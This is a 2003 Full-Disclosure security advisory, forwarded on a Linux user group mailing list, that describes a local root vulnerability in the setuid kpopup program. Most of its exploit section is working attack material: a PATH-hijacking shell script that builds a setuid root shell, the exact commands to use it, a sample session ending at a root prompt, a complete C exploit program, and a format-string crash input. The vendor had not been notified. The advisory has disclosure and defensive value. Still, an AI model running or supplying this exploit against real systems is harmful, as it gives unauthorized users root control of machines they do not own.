[Please upgrade as soon as a fix is available if you use kpopup on any platform. Disable it in the meantime -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Message-ID: <[EMAIL PROTECTED]> From: b0f <[EMAIL PROTECTED]> Sender: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Local root vuln in kpopup Date: Tue, 28 Oct 2003 10:13:56 -0800 (PST) A local root vuln exists in Kpopup version 0.9.1(latest) and proberly all other versions. It is avaliable from http://www.henschelsoft.de/kpopup_en.html (main site) http://www.freebsd.org/ports/net.html and many other places if you search kpopup on google. I. BACKGROUND Kpopup is a KDE program for sending and receiving MS Windows WinPopup messages. When package is compiled and install the binary kpopup gets installed suid root it also comes as part of FreeBSD ports collection. II. DESCRIPTION & EXPLOIT This app uses the system() call which is very unsafe expecially on a suid root binary. It also contains Format string bugs in the sprintf() function. In this advisory i will explain how to obtain root privlages from this app by exploiting system(). There is 3 places on the misc.cpp source that use system(). The one we use to exploit this is on line 106. void sendSignalForNewMessage() { char command[50]; sprintf(command, "killall -USR1 kpopup"); system(command); } To exploit this what we need to do is make a shell script and call it killall and place it in the /tmp directory. Here is a script that i wrote to exlpoit it. #!/bin/sh cd /tmp /bin/cat > shell.c << EOF #include <stdio.h> int main() { setuid(0); setgid(0); execl("/bin/bash", "-bash", NULL); return 0; } EOF /usr/bin/gcc /tmp/shell.c -o /tmp/shell /bin/chown root.root shell /bin/chmod 6711 shell echo "NOW HERE IS YOUR ROOT SHELL" /tmp/shell so place this in /tmp as killall and chmod +x it. Now what we need to do is. export PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin: Once this is done all we need to do is run the binary like so. /usr/local/kde/bin/kpopup root shell and thats it we now have root privs. an example run of this... [EMAIL PROTECTED] b0f]$ export PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin: [EMAIL PROTECTED] b0f]$ /usr/local/kde/bin/kpopup root shell fileerror! NOW HERE IS YOUR ROOT SHELL [EMAIL PROTECTED] tmp]# The format strings bugs are in that main.cpp source line 56 and 60 they can be triggered by [EMAIL PROTECTED] b0f]$ /usr/local/kde/bin/kpopup %n%n %n%n Segmentation fault [EMAIL PROTECTED] b0f]$ I haven't exploited the fmt bugs. There also seems to be possable race condtions in kpopup. III. EXPLOIT /*Local root exploit for kpopup *by b0f www.b0f.net */ #include <stdio.h> int main() { setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\ /usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:"); FILE *fd; fd = fopen("/tmp/killall", "w");{ fprintf(fd, "#!/bin/sh\n"); fprintf(fd, "cd /tmp\n"); fprintf(fd, "/bin/cat > shell.c << EOF\n"); fprintf(fd, "#include <stdio.h>\n"); fprintf(fd, "int main()\n"); fprintf(fd, "{\n"); fprintf(fd, "setuid(0);\n"); fprintf(fd, "setgid(0);\n"); fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n"); fprintf(fd, "return 0;\n"); fprintf(fd, "}\n"); fprintf(fd, "EOF\n"); fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n"); fprintf(fd, "/bin/chown root.root /tmp/shell\n"); fprintf(fd, "/bin/chmod 6711 /tmp/shell\n"); fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n"); fprintf(fd, "/tmp/shell\n"); fclose(fd); system("chmod +x /tmp/killall"); system("/usr/local/kde/bin/kpopup root shell"); return 0; } } IV. ANALYSIS An attacker could exploit this issue on a machine running kpopup to obtain root privileges. V.DETECTION This is vulnerable in all versions off kpopup tested on Redhat 9.0 VI. VENDOR The vendor has not been contacted about this issue. Regards b0f (Alan M) www.b0f.net __________________________________ Do you Yahoo!? Exclusive Video Premiere - Britney Spears http://launch.yahoo.com/promos/britneyspears/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F It is the mind that moves _______________________________________________ ilugd mailing list [EMAIL PROTECTED] http://frodo.hserus.net/mailman/listinfo/ilugd
